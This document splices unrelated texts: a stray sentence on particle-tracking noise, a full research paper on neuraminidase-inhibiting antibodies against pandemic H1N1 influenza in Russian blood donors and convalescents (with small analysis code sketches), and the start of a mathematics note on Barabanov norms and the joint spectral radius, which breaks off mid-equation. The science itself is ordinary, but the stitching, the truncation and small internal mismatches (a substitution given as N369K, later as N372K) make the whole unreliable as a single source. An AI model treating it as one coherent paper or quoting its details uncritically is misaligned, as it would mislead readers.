Extrapolation from the shortest time intervals indicates that the MSD values do not pass through the origin of the graph but instead cross the y-axis at about 0.01 µm² (Fig. 6, see inset). This gives an upper limit for the measurement noise of 0.1 µm, or about 1 pixel in our experimental set-up. This estimate is consistent with the error associated with the process of measuring the positions of the spot in the cell frame of reference.
Anti-neuraminidase antibodies against pandemic A/H1N1 influenza viruses in healthy and influenza-infected individuals
The main objective of the study was to evaluate neuraminidase-inhibiting (NI) antibodies against A/H1N1pdm09 influenza viruses in the community as a whole and after infection. We evaluated NI serum antibodies against A/California/07/09(H1N1)pdm and A/South Africa/3626/2013(H1N1)pdm in 134 blood donors of different ages using an enzyme-linked lectin assay, and in 15 paired sera from convalescents with laboratory-confirmed influenza. The neuraminidase (NA) proteins of the two A/H1N1pdm09 viruses had minimal genetic divergence but demonstrated different enzymatic and antigenic properties. Only 5.2% of individuals had NI antibody titers ≥1:20 against A/South Africa/3626/2013(H1N1)pdm, compared to 53% who were positive to A/California/07/2009(H1N1)pdm NA. Among participants negative to the hemagglutinin (HA) of A/H1N1pdm09 but positive to seasonal A/H1N1, 2% had detectable NI titers against A/South Africa/3626/13(H1N1)pdm and 47.3% were positive to A/California/07/2009(H1N1)pdm NA. The lowest NI antibody levels to both A/H1N1pdm09 viruses were detected in individuals born between 1956 and 1968. Our data suggest that NI antibodies against A/South Africa/3626/13 (H1N1)pdm found in the blood donors could have resulted from direct infection with a new antigenic A/H1N1pdm09 variant rather than from cross-reaction as a result of contact with previously circulating seasonal A/H1N1 variants. The immune responses against HA and NA were formed simultaneously right after natural infection with A/H1N1pdm09. NI antibodies correlated with virus-neutralizing antibodies when acquired shortly after influenza infection. A group of middle-aged patients with the lowest level of anti-NA antibodies against A/California/07/2009 (H1N1)pdm was identified, indicating that this group should have the highest priority for vaccination against A/H1N1pdm09 viruses.
Introduction
According to the WHO-recognized National Influenza Centers in Moscow and Saint Petersburg, the 2015/2016 epidemic season in Russia was characterized by a rapid increase in influenza and acute respiratory infection (ARI) morbidity from week 3 of 2016. Increases in influenza-like illness and hospitalization rates were similar to those observed during the 2009 pandemic and the 2010-2011 epidemic, and were much higher than in other seasons [1]. According to phylogenetic analysis of amino acid sequences of the main antigenic glycoprotein, hemagglutinin (HA), many of the A/H1N1 viruses isolated in Russia in 2015-2016 belong to clade 6B of A/H1N1pdm09 (A/South Africa/3626/2013-like) [1]. Antibodies directed against HA provide the main protection against influenza illness. However, as was shown in 1973, antibodies against the minor immunogenic viral glycoprotein, neuraminidase (NA), can also provide protection against influenza infection [2]. Namely, antibodies against NA block the release of viral progeny from cells during detachment of mature viral particles from the cell surface. At the initial stage of the influenza infection cycle, anti-NA antibodies may prevent attachment of HA to cellular receptors [3], block the proapoptotic NA function [4], and inhibit NA-mediated plasminogen activation [5]. Furthermore, antibodies against NA can facilitate recognition of infected cells by macrophages and natural killer (NK) cells, mediating activation of the complement system during complement-dependent cytotoxicity [6].
The hemagglutination-inhibition (HI) assay is most commonly used to assess previous exposure and protective immunity to influenza viruses, as well as to evaluate influenza vaccine immunogenicity. The presence of NA-inhibiting (NI) antibodies, however, remains the least explored. The 2009 influenza pandemic caused by A/H1N1pdm09 prompted a number of studies of antibodies against viruses containing the N1 NA. The importance of NA immunity against naturally occurring influenza was previously demonstrated by evaluating HI and NI antibody titers in a study conducted during 2009-2011 [7]. The presence of a population possessing cross-reactive NI antibodies, acquired as a result of previous infection or vaccination with previously circulating influenza viruses, can be decisive in reducing illness and mortality, as shown during the pandemic caused by the A/H3N2 virus in 1968 [2]. In addition, a number of studies were conducted to identify cross-reactive anti-NA antibodies against new influenza viruses such as A/H1N1pdm09 [8] and to examine the formation and function of protective antibodies against NA elicited by immunization with influenza vaccines [9,10]. At WHO meetings in 2005 and 2009, leading experts noted the increasing importance of developing and improving methods for the detection of antibodies against influenza virus NA [11]. It is important to study immunity against NA because NI antibodies are considered independent predictors of anti-influenza immunity [7,8]. The aim of the present study was to evaluate serum anti-NA antibodies against two A/H1N1pdm09 strains, A/California/07/09 (H1N1)pdm and A/South Africa/3626/2013 (H1N1)pdm, in the Russian population.
Viruses
To evaluate NI antibodies against A/H1N1pdm09 viruses, we developed chimeric viruses with HAs not related to seasonal influenza viruses. The A/H7N1 reassortant virus containing the HA from A/horse/Prague/1/56 (H7N7) and the NA from A/California/07/2009 (H1N1)pdm was prepared using classical genetic reassortment in developing chick embryos, as described elsewhere [12]. The A/H6N1 virus harboring the HA gene from A/herring gull/Sarma/51c/2006 (H6N1) and the NA from A/South Africa/3626/13 (H1N1)pdm was generated using a standard plasmid-based genetic technique [13].
Sequence analysis
DNA copies of the viral RNA segments were obtained using the OneStep RT-PCR Kit (Qiagen, Netherlands). Following electrophoresis of the DNA copies in 1.5% agarose gel and subsequent purification with the QIAquick PCR Purification Kit (Qiagen), sequencing was conducted on an ABI 3730xl DNA analyzer using the BigDye Terminator v3.1 Cycle Sequencing Kit (Applied Biosystems, USA). Processing of the nucleotide sequence data was performed using the 3730 Data Collection v3.0 software package (Applied Biosystems).
NA enzyme activity and kinetics
The NA activity of influenza H1N1 viruses was measured by a fluorescence-based assay using the fluorogenic substrate MUNANA (Sigma-Aldrich, USA), based on the method of Potier et al. [16] as described previously [17]. Briefly, A/California/07/09 (H1N1)pdm and A/South Africa/3626/2013 (H1N1)pdm viruses were standardized to an equivalent NA protein content of 0.015 ng/µl, as determined by protein gel electrophoresis using purified and concentrated viruses. This virus dilution was selected as one that converted 15% of the MUNANA substrate to product during the reaction time, in order to meet the requirements for steady-state kinetic analysis [17]. Virus dilutions were prepared in enzyme buffer [32.5 mM 2-(N-morpholino)ethanesulfonic acid (MES), 4 mM calcium chloride, pH 6.5] and added (100 µl/well) in duplicate to a flat-bottom 96-well opaque black plate (Corning, USA). After preincubation for 20-30 min at 37°C, the MUNANA substrate at various concentrations (separately pre-incubated for 20-30 min at 37°C) was added to all wells (50 µl/well). Immediately after adding the MUNANA substrate, the plate was transferred to a 37°C pre-warmed SpectraMAX Gemini XPS microplate reader (Molecular Devices, USA), and fluorescence was measured every 60 s for 60 min at 37°C using excitation and emission wavelengths of 360 nm and 460 nm, respectively. Enzymatic reactions were performed under conditions where signal-to-noise ratios were above 10 for more than 30 min of the reaction time. Time-course data from each concentration of the MUNANA substrate were examined for linearity by linear regression analysis, and data with R² > 0.99 were used for analysis. The kinetic parameters Michaelis-Menten constant (Km) and maximum velocity of substrate conversion (Vmax) of the NAs were calculated by fitting the data to the Michaelis-Menten equation using nonlinear regression in Prism 6.0 software (GraphPad Software, USA). Values are the means of three independent determinations.
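The final fitting step can be reproduced with any nonlinear least-squares routine; the sketch below uses scipy in place of Prism, with placeholder substrate concentrations and velocities rather than the study's measurements.

```python
import numpy as np
from scipy.optimize import curve_fit

def michaelis_menten(s, vmax, km):
    """Initial velocity as a function of substrate concentration s."""
    return vmax * s / (km + s)

# Substrate concentrations (uM) and measured initial velocities (uM/min);
# these numbers are illustrative placeholders, not data from the study.
S = np.array([5, 10, 20, 40, 80, 160], dtype=float)
V = np.array([0.9, 1.6, 2.5, 3.4, 4.1, 4.5])

popt, pcov = curve_fit(michaelis_menten, S, V, p0=[V.max(), np.median(S)])
vmax, km = popt
print(f"Vmax = {vmax:.2f} uM/min, Km = {km:.1f} uM")
```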
Ethics statement
The study involved a retrospective analysis of participant serum samples left over from routine tests. Blood serum samples were collected from 134 patients of the Institute for Experimental Medicine Medical Research Center for routine tests from January 6, 2016 to April 1, 2016. These included 16 sera from persons 24-39 years old, 31 sera from participants 40-59 years old, and 87 sera from patients aged 60-84 years. None of the participants had been vaccinated against influenza in 2016. Leftover sera were stored at -20°C. After approval was received from the Ethics Committee of the Institute for Experimental Medicine (No. 2/16 of May 12, 2016), these sera were provided for the study of neuraminidase antibodies. We also tested 42 archived serum samples obtained from non-vaccinated volunteers 20-59 years old in October 2010. The 15 paired sera from convalescents with laboratory-confirmed A/H1N1pdm09 influenza infections, collected in January-February 2016 at hospitalization and 4-8 days later, were provided by the Institute of Influenza. The age of these patients ranged from 19 to 83 years. Written informed consent was obtained from each participant. The participants were fully informed of the research procedures and any risks associated with participation, and consented to participate in scientific projects.
None of the authors collected the samples used in the study or had access to information that would allow the identification of individual patients during the extraction of data from medical records; the data were de-identified before access by any of the authors.
Detection of serum antibodies against A/H1N1 viruses
The HI test with blood sera was performed using a 0.75% suspension of human red blood cells (group '0') in U-bottom 96-well polymer plates for immunological reactions, using standard procedures [18]. To remove thermolabile inhibitors, the sera were heated at 56°C for 30 min. To remove thermostable hemagglutination inhibitors, the sera were treated with an extract of Vibrio cholerae NA (Denka Seiken Co., Japan) and tested in duplicate for HI antibodies with the following test antigens: A/South Africa/3626/13 (H1N1)pdm, A/California/07/2009 (H1N1)pdm, A/New Caledonia/20/99 (H1N1), and A/Puerto Rico/8/34 (H1N1). The titers of HI antibodies were expressed as the reciprocal of the highest serum dilution at which HI was observed.
The production of anti-NA antibodies against A/California/07/2009 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm was evaluated in the sialidase activity inhibition test [19] using the A/H7N1 and A/H6N1 reassortant viruses described above, after purification and concentration on a stepwise 30/60% sucrose gradient. To assay NI antibodies, 96-well plates (Sarstedt AG & Co, Germany) were coated overnight with 150 µL of 50 µg/mL fetuin (Sigma-Aldrich, USA). The purified A/H7N1 or A/H6N1 reassortants were adjusted in phosphate-buffered saline (PBS) containing 1% bovine serum albumin (BSA) to obtain 128 hemagglutination units (HAU), yielding an optical density at 450 nm (OD450) of 0.4-0.6. Aliquots (65 µL) of serum samples were heated at 56°C for 30 min, serially diluted in PBS-BSA, and incubated with an equal volume of pre-diluted virus for 30 min at 37°C. After incubation, 100 µL of the mixture was added to the fetuin-coated wells. After 1 h of incubation at 37°C, the plates were washed, and NA activity was measured by incubation with peroxidase-labeled peanut lectin (2.5 µg/mL, Sigma-Aldrich, USA) for 1 h at room temperature, followed by washing and addition of 100 µL of peroxidase substrate. The reaction was stopped after 5 min with 100 µL of 1 N sulfuric acid. OD values were measured at 450 nm using a universal microplate reader (ELx800, Bio-Tek Instruments Inc, USA). The titer of serum NI antibodies was calculated as the reciprocal of the dilution giving 50% inhibition of NA activity, i.e., a two-fold decrease in optical density in comparison with the virus control wells.
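The titer readout reduces to finding the highest dilution that still halves the virus-control signal; a minimal sketch with invented OD values follows (the function name and cutoff rule restate the 50%-inhibition criterion above).

```python
def ni_titer(dilutions, od_values, od_virus_control):
    """Return the NI antibody titer: the reciprocal of the highest serum
    dilution whose OD450 is at most half the virus-control OD
    (i.e. at least 50% inhibition of NA activity)."""
    cutoff = od_virus_control / 2.0
    positive = [d for d, od in zip(dilutions, od_values) if od <= cutoff]
    return max(positive) if positive else None  # e.g. 40 means a 1:40 titer

# Illustrative serial dilutions (reciprocals) and ODs, not study data:
print(ni_titer([10, 20, 40, 80, 160], [0.10, 0.15, 0.24, 0.38, 0.52], 0.55))
```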
Determination of neutralizing antibodies against A/South Africa/3626/13 (H1N1)pdm was carried out using the microneutralization (MN) test in Madin-Darby canine kidney (MDCK) cells with non-RDE-treated sera, as described previously [18].
Statistical analysis
Data were analyzed using Statistica software, version 6.0 (StatSoft Inc., USA). For statistical analysis, antibody titers were expressed as log2 of the reciprocal of the final dilution. Geometric mean titers (GMT), medians (Me), and lower and upper quartiles (Q1; Q3) were calculated and used to represent antibody levels. Comparisons of two independent groups were made with the nonparametric Kolmogorov-Smirnov two-sample test. To compare multiple independent groups, we used Kruskal-Wallis analysis of variance (ANOVA) with subsequent multiple pairwise comparisons based on Kruskal-Wallis rank sums. Comparisons of two dependent variables were performed using the Wilcoxon matched-pairs test. Fisher's exact two-tailed test was used for nominal variables. Nonparametric statistical dependence between two variables was measured using Spearman's rank correlation coefficient (r). A P-value < 0.05 was considered statistically significant.
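Two of these computations, the geometric mean titer on log2-transformed data and the Spearman rank correlation, are compact enough to sketch; the titer values below are placeholders, not study data.

```python
import numpy as np
from scipy.stats import spearmanr

def gmt(titers):
    """Geometric mean titer, computed on log2-transformed reciprocal titers."""
    logs = np.log2(np.asarray(titers, dtype=float))
    return 2 ** logs.mean()

ni_cal = [20, 40, 40, 80, 10, 160]   # placeholder titers
ni_sa  = [10, 20, 10, 40, 10, 80]
r, p = spearmanr(ni_cal, ni_sa)
print(f"GMT = {gmt(ni_cal):.1f}, Spearman r = {r:.3f} (P = {p:.3f})")
```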
Analysis of NA amino acid sequences of A/H1N1 viruses
We used a distance-based method for the reconstruction of NA phylogenetic trees. Based on the initial alignment, we evaluated the stability of the tree topology by bootstrap analysis, using the results of the construction and comparison of phylogenetic trees generated for 1,000 sets of NA amino acid sequences. Our phylogenetic analysis of N1 amino acid sequences demonstrated that the NA of A/California/07/09 (H1N1)pdm, as well as the NAs of other viruses isolated after 2009 in North America and Asia, was similar to the phylogenetic branch of swine viruses of the Euro-Asian lineage isolated in 2004 (Fig 1A). NA sequences of recent epidemic A/H1N1 viruses were more closely related to A/H1N1 strains isolated in 1918 and 1943 than to the A/H1N1pdm09 isolates. The NAs of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm were 98% identical and differed by only 10 amino acid substitutions (I34V, L40I, N44S, T135A, N200S, V241I, N248D, I321V, N369K, K432E; N1 numbering here and throughout the text), which do not alter NA polarity and/or charge. Mutations at residues 34, 40, and 44 were located in the NA stem, whereas the rest were located in the head domain outside the active center (Fig 1B) [20].
We next determined the NA activities of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm viruses by measuring the NA enzyme Km and Vmax values for both A/H1N1pdm09 strains, using the fluorogenic MUNANA as a substrate (Fig 1C and Table 1). Our data showed that the NA protein of A/South Africa/3626/13 (H1N1)pdm exhibited significantly higher affinity for the substrate (mean Km, 2.3-fold lower) than A/California/07/09 (H1N1)pdm NA (P < 0.05). Furthermore, the NA enzyme activity of A/South Africa/3626/13 (H1N1)pdm was significantly higher than that of A/California/07/09 (H1N1)pdm (Vmax ratio = 1.6; Fig 1C and Table 1). Surprisingly, the number of subjects with HI antibody titers ≥1:40 against A/California/07/09 (H1N1)pdm (i.e., the level traditionally associated with at least a 50% reduction in the risk of disease due to influenza infection) was significantly lower among volunteers examined in 2016 than in 2010 (P = 0.047). These results may suggest decreased circulation of A/H1N1pdm09 in 2016 compared to 2010.
Detection of HI and NI antibodies against A/South Africa/3626/13 (H1N1) pdm and A/California/07/09 (H1N1)pdm in 134 blood donors examined during the 2015-2016 epidemic season
Antibody levels against the HA and NA of A/H1N1pdm09 viruses were examined among 134 patients of the Medical Research Center. Since the examined subjects had not received vaccination against A/H1N1pdm09, it was assumed that antibodies to the surface antigens of A/H1N1pdm09 viruses were acquired through natural infection. Among all these subjects, statistically significant differences were found between HI antibody levels to A/South Africa/3626/13 (H1N1)pdm in participants with influenza-like illnesses (ILI) compared with those with no ILI (P = 0.0014, Fig 3A). With respect to A/California/07/09 (H1N1)pdm, these differences were not statistically significant (P = 0.058). These data may suggest that the drift A/H1N1pdm09 variant, presumably A/South Africa/3626/13-like, had already circulated in St. Petersburg along with A/California/07/09 (H1N1)pdm during the study period. As seen in Fig 3B, among all 134 volunteers 24-84 years of age, the majority had HI antibody titers <1:40 against both A/South Africa/3626/13 (H1N1)pdm and A/California/07/09 (H1N1)pdm. We observed similar proportions of subjects possessing HI antibody titers ≥1:40 against A/South Africa/3626/13 (H1N1)pdm and A/California/07/09 (H1N1)pdm (5.2% and 9.7%; P > 0.05). Contrary data were obtained for NI antibodies: NI antibody titers ≥1:40 against A/California/07/09 (H1N1)pdm were found in 33.6% of participants, whereas only 2.2% of subjects demonstrated such NI antibody levels against A/South Africa/3626/13 (H1N1)pdm (P < 0.0001). The correlation between NI antibody titers against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm among the 134 blood donors was of medium strength: only 19.1% of the variability in the ranks of one variable can be explained by the ranks of the other (r = 0.437, n = 134, P < 0.05, Fig 3C). The NI antibody titers against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm correlated better (r = 0.640; n = 49; P < 0.0001) in the sera of patients seropositive to A/H1N1pdm viruses (Fig 3D). The low NI antibody titers against A/South Africa/3626/13 (H1N1)pdm and high NI antibody titers against A/California/07/09 (H1N1)pdm may suggest that the drift variant A/South Africa/3626/13 (H1N1)pdm only started circulating in 2016. This finding may also indicate that antibodies against A/South Africa/3626/13 (H1N1)pdm NA found in the blood donors could have resulted from direct infection with a new antigenic A/H1N1pdm09 variant rather than from cross-reaction as a result of contact with previously circulating seasonal A/H1N1 variants. Thus, antibody levels against A/South Africa/3626/13 (H1N1)pdm NA were significantly lower than those against A/California/07/09 (H1N1)pdm NA among the 48 participants negative to the HA of A/H1N1pdm09 viruses but positive to A/New Caledonia/20/99 (H1N1) or A/Puerto Rico/8/34 (H1N1) (P < 0.0001; Fig 4A), whose HA amino acid sequences differ by more than 15% from those of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (Fig 4B). Since these patients did not possess antibodies against the HA of A/H1N1pdm09 viruses, it is likely that the detected antibodies to the HA of previously circulating A/H1N1 viruses could be the result of original antigenic 'sin'. Although the NA amino acid sequences of A/South Africa/3626/13 (H1N1)pdm and A/California/07/09 (H1N1)pdm were very similar (Fig 1A), the levels of "herd" immunity against the NA of A/H1N1pdm09 viruses in these patients varied significantly: NI antibody titers ≥1:40 were detected in 29.1% against A/California/07/09
(H1N1)pdm and were not found against A/South Africa/3626/13 (H1N1)pdm (P < 0.01).
Comparative analysis of the antibodies against A/H1N1 in patients of different ages
The age distribution of A/H1N1-specific antibodies was analyzed in several participant age groups: subjects born prior to 1957, when only A/H1N1 viruses circulated; subjects born between 1957 and 1976, when A/H2N2 and A/H3N2 viruses circulated; and subjects born in 1977 and later, when A/H1N1 re-emerged and began co-circulating along with A/H3N2 (Table 2).
The highest levels of anti-HA antibodies against seasonal A/New Caledonia/20/99 (H1N1) and both A/H1N1pdm09 viruses were detected in the 24-39 age group compared to older people (P = 0.023). Participants between 60-84 years of age demonstrated the lowest level of HI antibodies against A/New Caledonia/20/99 (H1N1), slightly increased HI titers against A/Puerto Rico/8/34 (H1N1), and the highest NI antibody titers against A/California/07/09 (H1N1)pdm compared with other groups (P < 0.0001) (Table 2). Our data confirm earlier findings that older people, who had been in contact with A/H1N1 viruses that had not circulated for a long time, may demonstrate original antigenic "sin" when infected with recent viruses [21,22]. In this case, priming antibodies are formed not only to the infecting virus but also to the previous variants. However, the question of the protective role of these antibodies remains unclear. On the one hand, the presence of such antibodies can make a definite contribution to protection against infection with a new antigenic variant [23]. On the other hand, there is evidence that pre-existing antibodies to previously circulating variants may somehow prevent the development of protective antibodies upon infection with new antigenic variants [24].
The lowest levels of NI antibodies against A/California/07/09 (H1N1)pdm, and no NI antibodies against A/South Africa/3626/13 (H1N1)pdm, were found in people 40-59 years old, who were born from 1956 to 1976 when the H2N2 and H3N2 viruses were in circulation (Table 2).
Analysis of sera samples from the convalescents
We included the 15 paired sera from patients with laboratory-confirmed A/H1N1pdm09 infection. We observed that mean HI and NI antibody titers against A/California/07/09 (H1N1)pdm were significantly higher on days 4-7 after the onset of symptoms compared to those at the date of onset (P = 0.01 and P = 0.015, respectively) (Fig 5A). HI and NI antibody titers against A/South Africa/3626/13 (H1N1)pdm increased as the disease progressed (P = 0.02, P = 0.043). Seven of 15 participants (46%) had a ≥4-fold HI antibody increase against either A/California/07/09 (H1N1)pdm or A/South Africa/3626/13 (H1N1)pdm, with 6 participants responding simultaneously to both viruses. Sera collected from 5 participants with increased post-infection NI antibodies >1:40 reacted with A/South Africa/3626/13 (H1N1)pdm in the HI test.
Because virus neutralization by antibodies in vitro often reflects the biological effect of protective antibodies, and the MN test is known to correlate well with the HI assay [25], we compared HI and NI titers with the MN antibody titers determined using A/South Africa/3626/13 (H1N1)pdm as the antigen. A strong relationship was found between neutralizing antibody titers and HI antibody titers against A/South Africa/3626/13 (H1N1)pdm (r = 0.705, n = 30, P < 0.0001), whereas a medium relationship was found between neutralizing antibody titers and NI antibodies against A/South Africa/3626/13 (H1N1)pdm (r = 0.579, P < 0.0001), as determined by the Pearson correlation test (Fig 5B and 5C). A medium relationship was observed between neutralizing antibody titers against A/South Africa/3626/13 (H1N1)pdm and HI antibody titers against A/California/07/09 (H1N1)pdm (r = 0.670, n = 30, P < 0.0001), as well as between MN antibody titers against A/South Africa/3626/13 (H1N1)pdm and NI antibody titers against A/California/07/09 (H1N1)pdm (r = 0.647, n = 30, P < 0.0001) (Fig 5D and 5E). These data suggest that anti-NA antibodies may be virus-neutralizing along with anti-hemagglutinating antibodies.
Discussion
Our data suggest that a small number of patients examined in the present study may have been infected with A/South Africa/3626/13-like influenza viruses by March 2016, resulting in the induction of homologous HI and NI antibodies. Contact with previously circulating A/H1N1 viruses did not induce cross-reactive NI antibodies against A/South Africa/3626/13 (H1N1)pdm, but did induce NI antibodies cross-reactive with A/California/07/09 (H1N1)pdm. Our survey revealed a low level of detectable NI antibodies against the new antigenic A/H1N1pdm09 variant (5.2%), especially in light of the fact that pandemic viruses have been circulating in Russia for more than 6 years. As shown in our previous work [26], even in 2005, i.e., long before the appearance of A/H1N1pdm09 in humans, the level of cross-reactive antibodies against A/California/07/09 (H1N1)pdm NA with titers ≥1:20 was 7.1%; after the introduction of the virus into circulation it increased to 30%, and later to 53% in 2016. The levels of "herd" immunity against NA, as determined by the number of subjects with NI antibody titers ≥1:40 against A/South Africa/3626/13 (H1N1)pdm, were low compared to those against A/California/07/09 (H1N1)pdm (Fig 3B). One explanation for these results could be antigenic differences between the NAs of the two pandemic viruses. As previously reported, even a single amino acid change within an immunodominant epitope may lead to loss of reactivity with polyclonal antisera [27]. For example, introduction of a single NA amino acid change at position 329 in the A/Solomon Islands/3/2006 strain resulted in reduced enzyme inhibition by ferret and human sera directed against this virus [28]. The amino acid sequences of the A/California/07/09 (H1N1)pdm NA and A/South Africa/3626/13 (H1N1)pdm NA differed by 2%, and 7 substitutions were located in the head domain, outside the active center.
The substitutions N372K and K432E were located in the region of the second binding site, commonly found in N6 and N9 avian influenza viruses [29]. When MUNANA was used as a substrate, A/California/07/09 (H1N1)pdm NA exhibited significantly decreased activity compared to that of A/South Africa/3626/13 (H1N1)pdm (Fig 1C, Table 1). These results may suggest an interplay between the enzyme activity and antigenicity of the N1 NA protein. Our finding may also explain the ineffective inhibition of A/South Africa/3626/13 (H1N1)pdm NA by cross-reactive NI antibodies induced against previously circulating A/H1N1 viruses, including A/California/07/09 (H1N1)pdm.
It has previously been reported that anti-HA stalk monoclonal antibodies bind to H6 HA, reducing the NA activity of reassortant H6NX viruses through steric interactions [22] and thus affecting the results of the NI reaction. Although we used the A/H6N1 reassortant virus in one case and A/H7N1 in the other for the NI test, the data are still comparable since the HA stalk domain is highly conserved [30]. We assume that the difference in NI antibody levels against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm in the population as a whole can be attributed to the presence of cross-reactive, rather than homologous, antibodies to a drift A/H1N1pdm09 variant. This was confirmed by the data from the A/H1N1pdm-positive patients, in whom the correlation between NI antibody levels against A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm was more pronounced than in the population as a whole (Fig 3D). Analyzing the sera of patients soon after influenza infection, we showed that the immune responses to both influenza surface antigens were induced simultaneously right after natural infection with A/H1N1pdm09 viruses (Fig 5A and 5B). Some autonomy of the HI and NI immune responses among subjects exposed to the virus in the past may be related to the timing of sampling, particularly when detecting anti-NA antibodies.
Influenza infection carries a particular risk of complications and increased mortality in the elderly. The disease is characterized by a combination of inflammatory changes in the upper respiratory tract with general intoxication and damage to the nervous and cardiovascular systems, causing severe complications when it develops against a background of atherosclerotic changes in the cardiovascular system and other chronic conditions [31]. In a number of previous studies, NI antibody titers against A/H1N1pdm09 were detected in the sera of older individuals [32], possibly explaining the reported low incidence of A/H1N1pdm09 disease in the elderly [33]. Indeed, the importance of NA immunity against naturally occurring influenza was demonstrated by evaluating HI and NI antibody titers in a study conducted during 2009-2011 [34], in which increased serum NI titers were associated with reduced illness. Elderly individuals who were likely exposed to the 1918 Spanish Flu pandemic had high neutralizing titers against A/H1N1pdm09 [21] and were more likely to possess cross-reactive antibodies against A/H1N1pdm09 N1 NA. In the present study, we did not observe a significant difference in HI and NI antibody levels against A/South Africa/3626/13 (H1N1)pdm among individuals born before 1957 compared to younger subjects. In contrast, the highest levels of NI antibodies against A/California/07/09 (H1N1)pdm were found in the older age group compared to the other groups studied. Thus, the highest levels of NI antibodies against A/California/07/09 (H1N1)pdm may be attributed to cross-reactive antibodies against A/H1N1 viruses other than A/H1N1pdm09. A group of middle-aged patients with the lowest level of NI antibodies against the new antigenic A/H1N1pdm09 variant was identified, indicating that this group should have the highest priority for vaccination against new antigenic variants.
Fig 1. Analysis of N1 NA proteins. (A) Phylogenetic analysis of amino acid sequences of NAs originating from different A/H1N1 viruses isolated from humans and swine (AA 1-469). The sequences were obtained from the NCBI Influenza Virus Sequence Database. Numbers of bootstrapping trees next to each node represent a measure of support for the node. (B) Three-dimensional model of the NA "head" (AA 83-469), created using Cn3D software. Seven amino acid substitutions that differ in the NA head domain of A/California/07/09 (H1N1)pdm compared to A/South Africa/3626/13 (H1N1)pdm are shown in purple. (C) NA enzyme kinetics of A/California/07/09 (H1N1)pdm and A/South Africa/3626/13 (H1N1)pdm viruses. Substrate conversion velocity (Vi) of NA was measured as a function of substrate concentration. https://doi.org/10.1371/journal.pone.0196771.g001

Comparison of "herd" immunity against A/California/07/09 (H1N1)pdm in the 2010-2011 and 2015-2016 epidemic seasons

We compared the HI and NI antibody levels against A/California/07/09 (H1N1)pdm in sera collected from adult volunteers between 20-59 years of age. The sera were collected in October 2010 (n = 42) and in January-March 2016 (n = 47). An ANOVA test showed no difference in the age distribution of participants between the two groups (P > 0.05). As seen in Fig 2, the proportions of participants with NI antibody titers <1:40 and ≥1:40 were similar between volunteers examined in 2010 (i.e., one year after A/H1N1pdm09 emerged) and in 2016 (i.e., after 6 years of A/H1N1pdm09 circulation).
Table 1. Enzymatic properties of A/H1N1pdm09 NAs. Columns: Viruses; Vmax (µM/min)^a; Km (µM)^b.
^a The Vmax was calculated using nonlinear regression of the curve according to the Michaelis-Menten equation. ^b The Km represents the Michaelis-Menten constant (µM) at which the reaction rate is half of Vmax. The enzyme kinetic data were fit to the Michaelis-Menten equation using GraphPad Prism, version 6.0. Values are the means ± standard deviations from three independent determinations.
A new sufficient condition for the uniqueness of Barabanov norms
The joint spectral radius of a bounded set of d × d real or complex matrices is defined to be the maximum exponential rate of growth of products of matrices drawn from that set. Under quite mild conditions such a set of matrices admits an associated vector norm, called a Barabanov norm, which can be used to characterise those sequences of matrices which achieve this maximum rate of exponential growth. In this note we continue an earlier investigation into the problem of determining when the Barabanov norm associated to such a set of matrices is unique. We give a new sufficient condition for this uniqueness, and provide some examples in which our condition applies. We also give a theoretical application which shows that the property of having a unique Barabanov norm can in some cases be highly sensitive to small perturbations of the set of matrices.
Introduction
Given a bounded set A of d × d matrices over R or C, the joint spectral radius of A is defined to be the quantity

ϱ(A) := lim_{n→∞} sup{ ‖A_n · · · A_1‖^{1/n} : A_1, . . . , A_n ∈ A },

a definition introduced by G.-C. Rota and G. Strang in 1960 ([18], subsequently reprinted in [17]). This limit always exists and is independent of the norm used (for a proof see e.g. [11]). The joint spectral radius has subsequently been found to arise in a range of mathematical contexts including control and optimisation [2,5,9], wavelet regularity [7], coding theory [15], and combinatorics [3]. As such, the properties of the joint spectral radius are the subject of ongoing research investigation (see for example [1,4,5,6,8,10,14]). This note is concerned with a theoretical tool associated to the joint spectral radius called the Barabanov norm, which we now define.
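As a concrete numerical aside (before turning to the Barabanov norm defined next), ϱ(A) can be bracketed by brute force over finite products. The sketch below is an illustrative addition, not part of the original note, and its cost grows exponentially in the product length.

```python
import numpy as np
from itertools import product

def jsr_bounds(mats, n_max=8):
    """Two-sided estimates of the joint spectral radius: for each n, the max
    spectral radius of length-n products gives a lower bound, and the max
    spectral norm of length-n products gives an upper bound (both ^(1/n))."""
    lower, upper = 0.0, np.inf
    for n in range(1, n_max + 1):
        prods = [np.linalg.multi_dot(w) if n > 1 else w[0]
                 for w in product(mats, repeat=n)]      # |mats|**n products
        lower = max(lower, max(max(abs(np.linalg.eigvals(P))) ** (1.0 / n)
                               for P in prods))
        upper = min(upper, max(np.linalg.norm(P, 2) ** (1.0 / n)
                               for P in prods))
    return lower, upper
```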
Let us say that a set A of d × d real or complex matrices is reducible if its elements simultaneously preserve a linear subspace with dimension strictly between 0 and d. If A is not reducible then it will be called irreducible. An irreducible set of matrices always has nonzero joint spectral radius (see e.g. [11]). In the article [2], N. E. Barabanov showed that to any compact irreducible set A of d × d matrices over R or C, one may associate a norm ||| · ||| on R^d or C^d such that the Bellman-like equation

max_{A ∈ A} |||Av||| = ϱ(A) |||v|||    (1.1)

is satisfied for every vector v. We shall call a norm which satisfies this relation for every v a Barabanov norm for A. Given any vector v, by iterating the above relation it follows that for each n ≥ 1,

max{ |||A_n · · · A_1 v||| : A_1, . . . , A_n ∈ A } = ϱ(A)^n |||v|||,

